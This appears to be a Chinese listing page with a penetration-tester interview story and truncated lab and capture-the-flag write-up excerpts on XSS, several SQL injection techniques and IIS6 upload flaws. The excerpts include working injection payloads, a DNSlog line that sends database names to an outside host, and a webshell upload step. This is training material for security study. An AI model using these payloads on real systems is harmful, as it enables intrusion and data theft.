深圳市某信息公司渗透测试工程师面试经验分享
这都是70老师教的,有一点很重要 不能吹的 要求实。所面试的公司:深圳市某信息公司所在城市:深圳面试职位:渗透测试工程师面试过程:技术+技术经理+人事面试官的问题:1、简单的介绍下你的工作经验,简历上没有看见,是没有还是???答:以前的工作和这个没有关系就没有写,具体的经验也就是在去年12月份开始在 各个src上提交漏洞,漏洞盒子比较多。还有就是教育src,cnvd,补天&
反射型xss 老兵
反射型xss存在的位置基本都是通过url传递的。一般就是见框就插 很容易就找到了这里插入没有弹给转义掉了输入单引号不会被转义还能成功的执行这就很好了 利用 'oninput=alert`laobing`//成功的弹出了flag 插入的语句成功的被执行 了这就搞定了 有不对的地方 请指点
老兵 SQL server反弹注入
这是主要的首先猜字段然后联合查询,记住要写UNIONALL然后猜输出点要使用NULL去填充注释只有-- (不要想着#)selectname from master.dbo.sysdatabases 查询系统库dbo.sysobjects查询系统表 (xtype='U')dbo.syscolumns字段 (id=) 指定idhttp://
老兵 dnslog注入
首先明白了什么是dnslog注入这里是调用了一个可以读取文件的函数load_file;原本是读取文件返回文件内容为字符串(需要使用此函数一般为root)。但是呢?这个函数还可以用来发送dns请求。load_file(concat('\\\\',(select database()),'.xxx.ceye.io\\abc'))。。。concat 为字符串拼接。se开头
access偏移注入 老兵
首先判断注入点。javascript:alert(document.cookie="ID="+escape("104 and 1=1"));看看是否拦截cookie注入。上面的看到了已经拦截掉了get有了and 1=1 回显正常证明了有注入。然后用order by 来查字段数。order by 30 没有,在用泽中法,来测试到27个就找不到了,在26的时侯回
文件上传解析漏洞 老兵提交
首先看看第一题,打开直接跳到了pass-20,好把,不管哪个先看题目,iis6解析漏洞,首先想到的是。;.截断,然后是asa cer asp 等会当做asp解析。还的必须是图片,那就用图片马了。cmd合成一个就行,定义了白名单。修改为.cer在发送就好了就剩下连菜刀了成功连接,拿到了flag。还是一样图马,也是通过burp抓包该包,同上的步骤。接着连接菜刀。成功拿到flag。同样的抓包
oracle报错注入
首先要加上?id=1,看下没问题,接着要提交单引号了。发现报错而且还爆出来了ORA,那就可以想到他是用的oracle数据库了。接着加上--+试试。发现正常了。这就好办了。利用到Oracle中的报错注入来试试。?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))--+得到了库名BATTLE01.接着查表名。select table
偏移 注入
这个也就是说从某表中跳过去查询指定表的内容,可以看到隐藏的内容。例如:先的到某表的字段26,然后在加上admin.*查询admin表里的所有字段有多少,如果,表与表的字段数不等的话会报错。靶场就是了,;猜到了有26个字段,在来猜admin表有多少个,javascript:alert(document.cookie="id="+escape("171 order by
cookie 注入
利用javascript:alert(document.cookie="id="+escape("171 order by 11"))来看看他是否报错,要注意的是在构造完这个语句之后,必须重新刷新下页面,不带?id=171.这是一个弹窗,证明已经执行了语句。接着点确定。再刷新下页面,如下图:数据库出错,证明没有11个字段,用10试下。成功返回正常,证明有10
post头注入
post注入,也就是表单的注入。当输入两个都输入admin时会回显当输入1' or 1=1#时直接进入了管理员。Qnfm' union select 1,2#判断显示位nfm' union select 1,table_name from information_schema.tables where table_schema=database() limit 4,1#Qn